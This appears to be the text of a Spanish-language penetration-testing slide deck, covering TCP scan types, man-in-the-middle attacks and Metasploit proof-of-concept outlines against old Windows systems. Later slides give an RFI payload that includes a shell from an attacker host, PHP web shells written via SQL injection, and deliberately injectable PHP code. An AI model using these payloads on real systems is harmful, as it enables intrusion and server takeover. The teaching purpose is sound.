  • 18. TCP SYN Técnica conocida como Half-open scan, escaneo medio abierto por excelencia se envía un paquete SYN fingiendo establecer una conexion y se espera la respuesta del Host, si llega un paquete SYN/ACK significa que esta abierto y no devolvemos la contestación ACK, devolvemos RST , esto para evitar que se complete el inicio de conexión y así burlar el registro del sistema como intento de conexión *Discreto *Excelentes resultados
  • 19. Comportamiento TCP SYN Hacker ---[SYN]---> [O] P. TCP abierto en la Victima Hacker <---[SYN/ACK]--- [O] P. TCP abierto en la Victima Hacker ---[RST]---> [O] P. TCP abierto en la Victima Hacker ---[SYN]---> [X] Puerto TCP cerrado en la Victima Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima Hacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima
  • 20. ACK scan Destinado a identificar aquellos puertos que están en estado silencioso de forma precisa cuando un puerto esta en este estado o no. Envía paquetes ACK con números de secuencia y confirmación aleatorios. si el puerto esta abierto, responderá con un paquete RST, pues no identificara la conexión como suya si el puerto esta cerrado responderá RST pero si no responde es que esta filtrado. * Apoyo de un escaneo anterior *Variable del ping si responde RST esta vivo si no es in alcanzable. *Identificar firewall bloqueando SYN.
  • 21. Comportamiento ACK scan Hacker ---[ACK]---> [O] Puerto TCP abierto en la Victima Hacker <---[RST]--- [O] Puerto TCP abierto en la Victima Hacker ---[ACK]---> [X] Puerto TCP cerrado en la Victima Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima Hacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima
  • 22. Null scan Similar al FIN, funciona del mismo modo, enviando paquetes malformados, pero en este caso con los flags desactivados, si el puerto esta cerrado nos responderá con RST y En caso de no recibir nada el puerto esta abierto o silencioso. Ciertos firewalls vigilan los paquetes de finalización aquí hace lo que FIN no.
  • 23. Comportamiento Null scan Hacker ---[ ]---> [O] Puerto TCP abierto en la Victima local ---[ ]---> [X] Puerto TCP cerrado en la Victima Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima Hacker ---[ ]---> [~] Puerto TCP silencioso en la Victima
  • 25. POC
  • 26. Ataques MIT 1. DNS cache poisoning 2. ARP Poisoning 3. Phishing 4. Sslstrip
  • 30.
  • 33. Penetración Windows Server 2003 prueba de concepto Puerto 445 1. ms08067 2. Crear usuario 3. Habilitar Escritorio Remoto 4. Cambiar la contraseña del Administrador OBJETIVO Mostrar el ataque de penetración a Windows server 2003 en un ambiente controlado.
  • 35. Metasploit Windows Server 2008 R2 •Numero de vulnerabilidad : ms09050 •Encontrar el servidor verificando versión de smb •Explotar la vulnerabilidad •Denegación de servicios. OBJETIVO Mostrar el ataque de Denegación de servicios a Windows server 2008 en un ambiente controlado.
  • 37. Metasploit Penetración a Windows XP SP3 Prueba de concepto 1. Encontrar la victima verificando versión de SMB 2. Lograr la obtención de una reverse shell 3. Habilitar el uso de escritorio remoto 4. Inyectar la conexión a escritorio remoto OBJETIVO Mostrar el ataque de penetración a windows XP sp3 en un ambiente controlado.
  • 39. Metasploit Windows 7 Penetración Prueba de concepto 1. Usar INGENIERIA SOCIAL 2. Copiar netcat a la victima y crear puerta trasera creando REVERSE SHELL 3. Vulnerar navegador web. 4. UPLOAD MI PATH C:DESTINODownloads OBJETIVO Mostrar el ataque de penetración a windows 7 en un ambiente controlado.
  • 41. Ataques XSS Analicemos la vulnerabilidad de xss Es una vulnerabilidad de grado medio alto ya que con estos ataques será posible el re alizar el hijacking que es el robo de identidad mediante las cookies del navegador
  • 45. Ataques RFI Remote file inclusion vulnerabilidad que afecta únicamente a paginas dinámicas programadas en PHP, consiste en enlazar archivos ubicados en un servidor remoto. RFI se aprovecha del uso irresponsable de las funciones include y requiere, las cuales, debido al limitado conocimiento del programador y las pocas o nulas validaciones que realiza antes de incluir una variable recibida por parametro de URL, pueden ser aprovechadas por usuarios maliciosos para incluir scripts programados para explotar dicha vulnerabilidad.
  • 46. Ataques RFI Remote file inclusion http://www.victima.com/index.php?nav=pagina1php http://www.victimacom/index.php?nav=pagina2.php <?php print system($_GET['command']); ?> http://www.victima.com/index.php?nav=http://atacante.com/shell .txt&command=ls
  • 47.
  • 48. Inyeccion SQL union all select "<?php eval($_GET['exec']); ?>",2,3,4into outfile"/var/www/html/exec.php"
  • 49. Analicemos este código <?php $link = mysql_connect('127.0.0.1','root', 'pass'); mysql_select_db('ejemplo', $link); $sql = mysql_query('select * from ejemplo where id='.$_GET['id'], $link); if(mysql_errno($link)) { echo mysql_error($link); exit; } while($row = mysql_fetch_assoc($sql)) { echo $ row['id']." ".$row['titulo']." ".$row['contenido']." ".$row['parent']; }? >
  • 51. Prueba de concepto OBJETIVO Mostrar el ataque de inyección SQL y la técnica de intrusión de SHELL en un ambiente controlado.
  • 52. EL RESULTADO llegando a una conclusión
  • 54.